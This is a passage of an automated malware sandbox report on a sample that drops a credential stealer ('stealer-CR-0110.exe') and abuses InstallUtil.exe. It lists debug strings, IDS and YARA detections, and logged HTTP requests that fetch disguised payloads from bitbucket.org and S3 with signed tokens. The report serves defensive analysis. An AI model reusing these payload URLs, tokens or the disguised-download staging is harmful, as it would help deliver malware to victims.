Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_08E3F54C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_08E3F550
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then jmp 08E3ADD0h	7_2_08E3AD10
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then jmp 08E3ADD0h	7_2_08E3AD18
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	8_2_02642435
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	8_2_0264243C
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D63358h	8_2_05D62FC8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D63358h	8_2_05D62FBA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D6B3F0h	8_2_05D6B330
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D6B3F0h	8_2_05D6B338
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05D6FAB0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05D6FAA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90CA8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49709

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.849128312.cmd.Fjz.52f8430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.stealer-CR-0110.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.5378024.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.53821fc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.53025fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe, type: DROPPED

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-479d-95c3-d6de93f73ae8/Llbodzuyqnk.wav?response-content-disposition=attachment%3B%20filename%3D%22Llbodzuyqnk.wav%22&AWSAccessKeyId=ASIA6KOSE3BNI2FYFJS5&Signature=iHriFimLoltXdt5jxd9L4iNbvFk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQCf%2BiTBGoOb2%2FoSbo29PHijrNyTDWHeuoyFbJadJVb9wAIgS3Pt4G0c1jqGkwCwSO1mbhZlcjS9NRDtPBsZ%2BcC7n8YqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDATYITCcujwDUeM9ViqEArxZnpRlcxAbGJscSY15XkLPDxtggx1vwxhjHt0NQhSZB5XRuZ8k9rCO9Tu3AVOwZvCF3FGaai7E9BtFdD6f7b%2B6nDUz5461DuFA8IoR%2BBJoS74vostzPHD9LVhTzzbJpesAYaOyNAhSMMG53vaEa0suSSIDddaMf57foW3R%2BuhHGt5V0IQGqDe68Stt6m6HnDihHDQdXKPx4qVQfKHpX9FHo7VAmtDXE50K2WemvrMe%2BcEf97cH4wcg%2FQyRaNkDvSGkMGJEXbxNIOBKlLYG2gDS8b9XJ4vu08n7DOi%2FE%2B9Lj%2BxtuLQXibeswsoQ6kxoOwWASrDOYGEXcOHvDOrDbgJ0Ogs9MNyurbgGOp0Bitz4Ty9PFWwjYC4fwyQ%2FuWalhv%2F4xhiZYGsaxi%2B7S9X5XyEJoiNoWnrwR%2F90hmXbpLnnxAPPTDBIsFEzXlN5vCX0GzaR234%2BwdIrcCMX9%2Bt%2FDbCW8e19US7mkjuHLpVxz4Mu%2Bl9bbNbUOSX5LtLVSHOGZ2MUbODnugftkxQ2hQr%2FAlpqx2vQ7Av%2Fx5dweTJj1eWeoFNiKYXSAWqX6Q%3D%3D&Expires=1728798308 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Gqjmdstn.pdf HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-485a-b261-bddc3faeff6c/Hgjcrxfnz.mp3?response-content-disposition=attachment%3B%20filename%3D%22Hgjcrxfnz.mp3%22&AWSAccessKeyId=ASIA6KOSE3BNIEIP43DP&Signature=B5adOCQBGaXXStvtgXJrT%2FK011k%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIEKWj%2FjyJyUla4TUxj2qwDJeUpL8HAtTC9v2mxsTnr%2FtAiEAhX3oj6Xtqz7EgE9a8P5stTogLwKy2JdlhKi15IG8BZYqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDAFClDm68vTnYNr3GCqEApcGUDsrbHb6g7SkUBVzttzG23544pAb24muMUib8sEh4SMVlpf48ZeWA3DOIDSoeIwy3s0fXGwimVWr8HZ%2BpPpZYiQsLVffDmcpe3iR3yNr3FctMSfhkmhpEhGBNXpOvWCi7FYMWqvfdwS7BVP1xPP%2FOpati3cBm3AghhtQ7zP9x4%2BCqiyUIJaOB8vmh3SyDDWSoENBxPEjnNUACfIDTpfT1b6br9zUo5yBYoX9FkUwrtRyJ1RCpVvVyuSgU9xaAAm1VI4JWql9dfF9clDNIjFz2VYgEtCPpeYI%2BrltH6SGga5djb3oBTVPAYrlZuL3JyePjqvvSWm1dtyFE7cZ8jJj7ymZMOOurbgGOp0BhZnTNFhhGUWCfhkEEJcjLMbknDlN5Ia8oI6auJNYVbnSd3pVhcPRhn2XOfyMYfh2A81qE8FkFp67uzAr9GNOgBq4kI0URvRGnx9XyxxVe%2BByCrIrs8%2FQ%2Bj9Ns%2FZmTwD7UeyxBkd8v4%2FOWGcU5QTsYA7YPwyqUDjBCfybRPoT1d1rQhME0tQLVgfkpVt1UpQvNT1u4j1HfW6VohIpkw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-4d48-9b47-4bc96cf59a21/Gqjmdstn.pdf?response-content-disposition=attachment%3B%20filename%3D%22Gqjmdstn.pdf%22&AWSAccessKeyId=ASIA6KOSE3BNNGREZMSF&Signature=v6ZxFBV4nL3oaCjj1qj3kdiRbnw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQDZG%2Fk6XI2yYOu2V0Utzpd0eIOAE7HVeOOT%2FWQy4YMOKAIgMa6sJ4%2BiMtC5KTu8k7z6l7nKIuFwY7qAWn2LWVEiC2wqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDPdE3wsOdxXVeiwi1yqEAm8JejVR0obvQzZTIMsidRXOtJskS%2BVEsymGex9hcbQefXJ3reUU40QJbwQBW5C420ningDWxPVNlpaPZapZR2BlLS9QkAtHgp8K6OH2fSduvDuArtzJuO4RwxZpsRBQhQnUbKRZZOTm%2FnA7mwNmtBV4QKGS8K2N%2FDeGbCL4nttii2NJyWIaZW%2F6dPRJRH8kFkKFOArzlPZqtRwHoEdqC%2Bm%2BYvYgXZKkNghuOv8TTnyhCInS9%2F6ppGYX92rTA7w7ebYAFSuWKnrGM6h2jbcbA17nBzCTddSDLv%2FOdA2ZtLpRSRTyJ5G49HYxR%2BM4iDqPM03geohF3N5%2Fa%2F7LVcAmG321KfxvMOOurbgGOp0BbR31EsB77Otm7dUE8SkWQ%2B7sYnhv7MVJXvkV5NTPgD8asf8VCMmDQu6beM2ybLz1%2BRcdPp3aRxLf1fobnyS6rN3M1Hnp611qVue%2BaHF9MWbLo%2B8n1dhiUj1uO7cj2pd20P4L%2BbbBaB8U6mLTpM0lqtIEw3nCOx4tsw6h6N66tp7DLpQawPIuNOaueiybJ%2FL3RUP8D9SWRN7bxWB%2BGw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.166.143.48 185.166.143.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 185.166.143.48:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-479d-95c3-d6de93f73ae8/Llbodzuyqnk.wav?response-content-disposition=attachment%3B%20filename%3D%22Llbodzuyqnk.wav%22&AWSAccessKeyId=ASIA6KOSE3BNI2FYFJS5&Signature=iHriFimLoltXdt5jxd9L4iNbvFk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQCf%2BiTBGoOb2%2FoSbo29PHijrNyTDWHeuoyFbJadJVb9wAIgS3Pt4G0c1jqGkwCwSO1mbhZlcjS9NRDtPBsZ%2BcC7n8YqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDATYITCcujwDUeM9ViqEArxZnpRlcxAbGJscSY15XkLPDxtggx1vwxhjHt0NQhSZB5XRuZ8k9rCO9Tu3AVOwZvCF3FGaai7E9BtFdD6f7b%2B6nDUz5461DuFA8IoR%2BBJoS74vostzPHD9LVhTzzbJpesAYaOyNAhSMMG53vaEa0suSSIDddaMf57foW3R%2BuhHGt5V0IQGqDe68Stt6m6HnDihHDQdXKPx4qVQfKHpX9FHo7VAmtDXE50K2WemvrMe%2BcEf97cH4wcg%2FQyRaNkDvSGkMGJEXbxNIOBKlLYG2gDS8b9XJ4vu08n7DOi%2FE%2B9Lj%2BxtuLQXibeswsoQ6kxoOwWASrDOYGEXcOHvDOrDbgJ0Ogs9MNyurbgGOp0Bitz4Ty9PFWwjYC4fwyQ%2FuWalhv%2F4xhiZYGsaxi%2B7S9X5XyEJoiNoWnrwR%2F90hmXbpLnnxAPPTDBIsFEzXlN5vCX0GzaR234%2BwdIrcCMX9%2Bt%2FDbCW8e19US7mkjuHLpVxz4Mu%2Bl9bbNbUOSX5LtLVSHOGZ2MUbODnugftkxQ2hQr%2FAlpqx2vQ7Av%2Fx5dweTJj1eWeoFNiKYXSAWqX6Q%3D%3D&Expires=1728798308 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Gqjmdstn.pdf HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-485a-b261-bddc3faeff6c/Hgjcrxfnz.mp3?response-content-disposition=attachment%3B%20filename%3D%22Hgjcrxfnz.mp3%22&AWSAccessKeyId=ASIA6KOSE3BNIEIP43DP&Signature=B5adOCQBGaXXStvtgXJrT%2FK011k%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIEKWj%2FjyJyUla4TUxj2qwDJeUpL8HAtTC9v2mxsTnr%2FtAiEAhX3oj6Xtqz7EgE9a8P5stTogLwKy2JdlhKi15IG8BZYqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDAFClDm68vTnYNr3GCqEApcGUDsrbHb6g7SkUBVzttzG23544pAb24muMUib8sEh4SMVlpf48ZeWA3DOIDSoeIwy3s0fXGwimVWr8HZ%2BpPpZYiQsLVffDmcpe3iR3yNr3FctMSfhkmhpEhGBNXpOvWCi7FYMWqvfdwS7BVP1xPP%2FOpati3cBm3AghhtQ7zP9x4%2BCqiyUIJaOB8vmh3SyDDWSoENBxPEjnNUACfIDTpfT1b6br9zUo5yBYoX9FkUwrtRyJ1RCpVvVyuSgU9xaAAm1VI4JWql9dfF9clDNIjFz2VYgEtCPpeYI%2BrltH6SGga5djb3oBTVPAYrlZuL3JyePjqvvSWm1dtyFE7cZ8jJj7ymZMOOurbgGOp0BhZnTNFhhGUWCfhkEEJcjLMbknDlN5Ia8oI6auJNYVbnSd3pVhcPRhn2XOfyMYfh2A81qE8FkFp67uzAr9GNOgBq4kI0URvRGnx9XyxxVe%2BByCrIrs8%2FQ%2Bj9Ns%2FZmTwD7UeyxBkd8v4%2FOWGcU5QTsYA7YPwyqUDjBCfybRPoT1d1rQhME0tQLVgfkpVt1UpQvNT1u4j1HfW6VohIpkw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-4d48-9b47-4bc96cf59a21/Gqjmdstn.pdf?response-content-disposition=attachment%3B%20filename%3D%22Gqjmdstn.pdf%22&AWSAccessKeyId=ASIA6KOSE3BNNGREZMSF&Signature=v6ZxFBV4nL3oaCjj1qj3kdiRbnw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQDZG%2Fk6XI2yYOu2V0Utzpd0eIOAE7HVeOOT%2FWQy4YMOKAIgMa6sJ4%2BiMtC5KTu8k7z6l7nKIuFwY7qAWn2LWVEiC2wqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDPdE3wsOdxXVeiwi1yqEAm8JejVR0obvQzZTIMsidRXOtJskS%2BVEsymGex9hcbQefXJ3reUU40QJbwQBW5C420ningDWxPVNlpaPZapZR2BlLS9QkAtHgp8K6OH2fSduvDuArtzJuO4RwxZpsRBQhQnUbKRZZOTm%2FnA7mwNmtBV4QKGS8K2N%2FDeGbCL4nttii2NJyWIaZW%2F6dPRJRH8kFkKFOArzlPZqtRwHoEdqC%2Bm%2BYvYgXZKkNghuOv8TTnyhCInS9%2F6ppGYX92rTA7w7ebYAFSuWKnrGM6h2jbcbA17nBzCTddSDLv%2FOdA2ZtLpRSRTyJ5G49HYxR%2BM4iDqPM03geohF3N5%2Fa%2F7LVcAmG321KfxvMOOurbgGOp0BbR31EsB77Otm7dUE8SkWQ%2B7sYnhv7MVJXvkV5NTPgD8asf8VCMmDQu6beM2ybLz1%2BRcdPp3aRxLf1fobnyS6rN3M1Hnp611qVue%2BaHF9MWbLo%2B8n1dhiUj1uO7cj2pd20P4L%2BbbBaB8U6mLTpM0lqtIEw3nCOx4tsw6h6N66tp7DLpQawPIuNOaueiybJ%2FL3RUP8D9SWRN7bxWB%2BGw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
